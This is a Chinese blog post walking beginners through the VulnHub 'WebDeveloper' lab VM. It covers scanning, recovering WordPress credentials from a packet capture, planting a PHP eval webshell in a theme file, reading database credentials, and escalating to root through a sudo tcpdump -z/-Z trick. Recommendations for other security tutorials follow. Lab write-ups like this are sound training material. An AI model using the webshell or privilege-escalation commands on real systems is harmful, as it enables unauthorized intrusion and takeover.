WebDeveloper内网渗透流程(新手入门流程梳理)

已于 2025-01-03 11:43:39 修改
阅读量1.6k 收藏 21
点赞数 1
分类专栏: 学习笔记 文章标签: linux 网络安全
于 2023-03-12 13:00:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_30889301/article/details/129473137
版权

WebDeveloper内网渗透流程(新手流程梳理)

本篇博客面向入门主机渗透方面的新人,根据这个较为简单的入门级靶机梳理渗透思路和流程。

vulnhub 新手级离线靶场
VMware 15.5
kali镜像:kali-linux-2022.4-installer-amd64
kali ip:192.168.100.83

靶场下载地址: https://download.vulnhub.com/webdeveloper/WebDeveloper.ova

流程目录

下载好靶机之后直接使用VMware软件打开ova,启动即可,将虚拟网络设置为NAT模式或者桥接直连物理网即可
打开后效果如下
在这里插入图片描述
本文章用比较入门的操作来梳理流程

一 信息收集

1.1 nmap

首先扫描靶机所在的网段,使用nmap工具扫描,确认靶机ip。

在这里插入图片描述
对发现的靶机ip进行端口扫描,收集开放的端口与服务类型。
发现这个100.211的IP开放了 ssh和http服务。
在这里插入图片描述
切换浏览器中尝试访问一下
在这里插入图片描述
确定靶机中的web应用,并对web部分开始信息收集
本靶机web收集思路:web目录收集、web服务信息(CMS、应用框架信息、中间件版本、协议版本等)、交互页面API等

1.2 dirsearch

dirsearch扫描windows版

python dirsearch.py -u http://192.168.100.211/

在这里插入图片描述
发现有疑似似登录的页面/wp-login.php
更改url内访问页面,发现管理登录页面
在这里插入图片描述

1.3 whatweb

为了得到更多信息使用kali中whatweb工具进行扫描查看网站详细信息

whatweb http://192.168.100.211 -v

whatweb扫描发现该网站是WordPress生成的
在这里插入图片描述

1.4 dirb

使用kali的dirb工具扫描,dirb工具可以更全面的扫描出该类型的网站页面和路径

dirb http://192.168.100.211

扫描发现一个叫ipdata的文件,该文件一般用于存放流量文件,可能会有登录信息相关内容
如本图的倒数第三行
在这里插入图片描述

1.5 流量分析——WireShark

更改URL访问该路径发现有一个analyze.cap的流量包文件
在这里插入图片描述
下载到本地使用wireshark打开,发现存在应用交互历史记录
在这里插入图片描述

为了知道登录包的如何传送的,先回到登陆页面随便的登陆一下
此时发现登录时的包是POST请求
在这里插入图片描述
那么就在wireshark中设置过滤规则

http.request.method==POST

既然是POST请求就在这俩包里面翻找一下有没有登陆的信息
发现疑似登录的账号字段“log”和密码字段“pwd”
在这里插入图片描述

使用该字段的值登录一下试试
登陆成功!

在这里插入图片描述

二 木马注入

在此处发现一处疑似可以注入一句话木马的功能

覆盖掉原本内容,尝试进行写入后门。

2.1 一句话木马
<?php @eval($_POST['a']);?>

在这里插入图片描述
上传注入成功
在这里插入图片描述

2.2 蚁剑连接

下面准备使用蚁剑连接
但是先确认一下注入文件的位置
由页面左边可知我们更改的是hello.php
之前dirsearch爆出来的文件里刚好有hello.php的web路径
在这里插入图片描述

确认路径后使用蚁剑连接
连接成功,通过蚂剑读取主机所存储的文件目录及文件内容。
在这里插入图片描述
在WEB应用所在目录下发现应用配置文件,配置文件一般存在脆弱点或其他敏感内容,管理员不恰当的配置可能会导致安全隐患。
wp-config.php文件应该就是这个web项目的部分配置文件
在这里插入图片描述

打开发现数据库账户和密码
在这里插入图片描述

2.3 主机连接(ssh)
/** MySQL database username */
define('DB_USER', 'webdeveloper');

/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');

使用ssh登录这个账户进入靶机。

在这里插入图片描述
登陆成功
在这里插入图片描述

三 用户越权

登陆后先查看一下当前用户权限

sudo -l

在这里插入图片描述
发现可以使用tcpdump进行提权

3.1tmp文件夹特性利用

利用tmp的文件特性:
“通常,/tmp 目录的权限会被设置为 1777,这是一个八进制数。这意味着它具有读、写和执行权限,因此属主、属组和其他用户都可以访问它”

现在已知tmp是灰色权限文件夹
进入tmp文件夹下准备提权
在这里插入图片描述

3.2 越权执行

命令思路就是

  1. 先创建一个执行文件
  2. 将要执行的越权命令写入被创建文件
  3. 把被创建文件权限拉满
  4. 通过sudo-tcpdump越权执行文件中的命令
  • tcpdump中有两个关键参数-z和-Z
  • -z 用来执行一个脚本,-Z用来指定tcpdump以哪个用户运行
  • 当可以通过sudo执行时,则可以指定以root用户运行一个脚本,从而达到提权的目的
touch DN                  //在tmp文件夹里创建一个DN(随便按的)
echo "ls /root/" > DN     //把要执行的命令写入DN里面
chmod 777 /tmp/DN         //给DN文件 777 权限
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/DN -Z root
//最后通过sudo-tcpdump执行越权文件

tcpdump命令详解:
-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
-W [num] 指定抓包数量

通过sudo tcpdump执行越权文件内容“ ls /root/ ”查看了root目录下存在flag.txt

在这里插入图片描述

四 拿下flag

然后更改DN文件越权文件内容

echo "cat /root/flag.txt" > DN

再次执行sudo-tcpdump越权命令得到flag内容
在这里插入图片描述

本文操作仅适用于入门练手,部分步骤可能有些简化,仅供参考和思路梳理

Web安全渗透详细教程+学习线路+详细笔记【全网最全】
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
04-19 3万+
欢迎关注微信公众号:hacklex 让安全技术不再神秘,让编程更加有趣~~~ 1. 序章 1.1. Web技术演化 1.2. 网络攻防技术演化 1.3. 网络安全观 2. 计算机网络与协议 2.1. 网络基础 2.2. UDP协议 2.3. TCP协议 2.4. DHCP协议 2.5. 路由算法 2.6. 域名系统 2.7. HTTP协议簇 2.8. 邮件协议族 2.9. SSL/TLS 2.10. IPsec 2.11. Wi-Fi ...
AutoSAR系列讲解(入门篇)5.4-ECU的项目流程
热门推荐
雪云飞星的博客
08-28 2万+
主要讲解了AutoSAR开发团队和开发流程
web渗透视频教程
12-24
web渗透视频教程共计28GB,只有你想不到的,没有我们做不到的快来学习吧,成为IT大牛你行的!!!
Web安全渗透详细教程2023年最新版+学习线路+资料分享【全网最全】
BlueSocks152的博客
03-24 1328
Web安全是指保护Web应用程序和Web服务器免受恶意攻击和未经授权访问的一系列技术、措施和最佳实践。Web安全是确保Web应用程序和Web服务器能够正常运行、保持数据完整性、保护用户隐私和信息安全的重要方面。
黑客技术之web渗透---实战案例演示如何进行windows内网渗透
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-08 868
不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取。
Web渗透测试入门教程
weixin_34206899的博客
11-16 1414
学校今年对比赛格外重视,暑假从7月14到28日专门安排了2个周时间进行集训。我为学生们安排的集训内容是Web渗透测试入门,这部分内容与比赛关联性其实并不是太大,但却有助于激发学生兴趣,引导他们入门。在讲课过程中我同步录制了视频,并已经发布在51cto: http://edu.51cto.com/course/course_id-6681.html 初...
【全网最全】Web安全渗透详细教程2024年最新版+学习线路+资料分享
2301_77472496的博客
03-14 1593
在Web安全领域。是否具备编程能力是“脚本小子”和真正Web安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。
vulnhub Web Developer: 1
箭雨镜屋
01-02 2052
本文思路: nmap扫描---->dirb扫描---->wireshark分析.cap文件发现wordpress用户名和密码---->利用wordpress的上传theme功能getshell---->用linpeas.sh找到webdeveloper用户账号密码---->利用tcpdump命令进行sudo提权
网络安全kali渗透学习 web渗透入门 Metasploit基本使用方法
xueshenlaila的博客
02-25 3065
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 这篇文章教大家了解Metasploit基本使用方法 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透
内网横向渗透之各种传递攻击
技术超强的网络安全平台
05-06 2422
内网横向渗透之各种传递攻击 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透。 横向渗透 在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。 利用PsExec工具进行横向渗透 PsExec 最强大的功能之一是在远程系统和远程支持
iOS支付指南:POS终端刷卡流程、银联55域TLV子域信息说明、银联前置、NFC
专注于计算机研发知识和资讯分享
01-28 4593
文章目录引言I、支付流程1.1 POS终端刷卡流程1.1.1 什么是POS机签购单?1.1.2 签购单未打印,但持卡人收到扣款信息,商户应该怎么办?1.1.3 发卡行返回码see also 引言 I、支付流程 下单:商户完成订单信息的录入,包括但不限于待付款总金额。手机号码录入,生成订单。平台接受订单后,将订单信息和支付验证码以短信形式发送到用户手机。 付款:商户提交用户短信中的验证码,完成支付。 补款:若用户已经绑定银行卡,且支付时余额不足的情况,可自动补款。 捡起支付:订单下单成功后支持各种网站、客户
Web渗透测试(整个全流程).pdf
11-25
web渗透测试的整个流程详解,并带有各个工具推荐 真的非常的详细,可以带初学者快速入门,已经从事web渗透测试的也可以参考 内容:信息收集,漏洞扫描,渗透测试等里面详细的步骤 可以按照步骤一步步的操作,非常具有实操价价值
Web安全渗透详细教程+学习线路+详细笔记「全网最全+建议收藏」
xx16755498979的博客
06-16 371
互联网刚开始是安全的,但是伴随着黑客的诞生,互联网变得越来越不安全。与此同时,随着Web技术发展越来越成熟,而非Web服务越来越少的暴露在互联网上,现在互联网安全主要指的是Web安全。为了自身不“裸奔”在大数据里,渐渐开始学习Web安全,在学习Web安全的过程中,发现很大一部分知识点都相对零散,如果没有相对清晰 的脉络作为参考,会给学习带来一些不必要的负担。于是之后就把一些知识、想法整理记录下来,最后形成了这份。这份文档,对等内容做了详细的讲解,希望这份笔记能够为正在入门的你提供一定的帮助。
渗透测试之Web安全系列教程(一)
fearhacker的专栏
06-02 1252
script 标签 的 src 属性,指向跨域脚本的URL地址!如果客户端,是我们自己编制的浏览器,或者是自己编制的可以解析网页内容的脚本,那么,我们是可以突破同源策略限制的!由于 浏览器的同源策略,并没有对 script 等标签进行同源限制,这导致了 恶意黑客 可以利用这一特性,并通过一些 Web 网站中所存在的XSS注入漏洞,将一些恶意的代码(包含 script 相关内容,而 script 的 src 属性的值,可能是指向某个其它域的、包含木马脚本的URL地址)内容嵌入到 Web 网站的指定页面中。
《Web安全渗透全套教程(40集)》学习笔记 | 文d件d包d含d渗d透d原理及实验
COCO_gsta的博客
05-05 801
学习视频来源:B站《Web安全渗透全套教程(40集)》 个人在学习的同时,也验证了视频中的实验部分,现将授课笔记和实验笔记整理下来。 项目实验环境 写shell.php文件,一句话木马 原理及危害 绿色才是应该包含的,红色和黄色的为不应包含的 低安全级别渗透 低安全级别 默认包含了include.php文件 查看低安全级别下的源代码,没有做任何过滤 本地文件包含 本地文件包含系统文件(URL路径为参考路径) 在fi目录下创建y.txt文件,选择“File
小白入门web渗透学习教程
weixin_42128903的博客
04-23 6543
小白入门web渗透教程,激发你的潜能和兴趣。对web渗透有个总体了解。免费资料献给大家; 主要内容: 浅谈安全威胁-1,2,3; 最简单的病毒-1,2; 木马-1,2,3,4; 钓鱼-1,2,3; 密码-1,2; 信息收集; 扫描; openvas; burpsuit; 联合查询注入; 其他注入介绍; SQlmap与DVWA爆破; CSRF; 其它漏洞; 永恒之蓝; beef; 百度网盘下载地址: 链接:https://pan.baidu.com/s/1_6cLJRRpU
Web安全渗透全套教程 [1/40]
捡破烂日记^ ^
04-12 3687
安全渗透环境准备虚拟机:一、攻击机(渗透机):kali二、靶机1:OWASP_Broken_Web_Apps三、靶机2:win7 虚拟机: 注: 预装vmware; 一、攻击机(渗透机):kali 下载链接:https://cdimage.kali.org/kali-2021.1/kali-linux-2021.1-installer-amd64.iso 二、靶机1:OWASP_Broken_Web_Apps 下载链接:https://jaist.dl.sourceforge.net/project/owa
《Web安全渗透全套教程(40集)》学习笔记 | SQL注入攻击及防御
COCO_gsta的博客
05-18 4846
学习视频来源:B站《Web安全渗透全套教程(40集)》 个人在学习的同时,也验证了视频中的实验部分,现将授课笔记和实验笔记整理下来。 SQL注入危害 SQL基础回顾 连接数据库 查看数据库:show databases 进入dvwa数据库 查看表 查看表结构 查看表记录 select * from dvwa.users union select 1,2,3,4,5,6,猜测出系统的字段数量,再用select * from dvwa.users un
《Web安全渗透全套教程(40集)》学习笔记 | 文件上传漏洞原理及实验
COCO_gsta的博客
04-04 1186
学习视频来源:B站《Web安全渗透全套教程(40集)》 个人在学习的同时,也验证了视频中的实验部分,现将授课笔记和实验笔记整理下来。 实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2,用户名/密码:root/owaspwba 测试渗透机:Kali-Linux-2018.2-vm-amd64,用户名/密码:root/toor (2个虚拟机可通过baidu搜索下载,有需要的小伙伴可私信我) 渗透机开启ssh服务(默认无法通过SecureCRT登录) service s
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值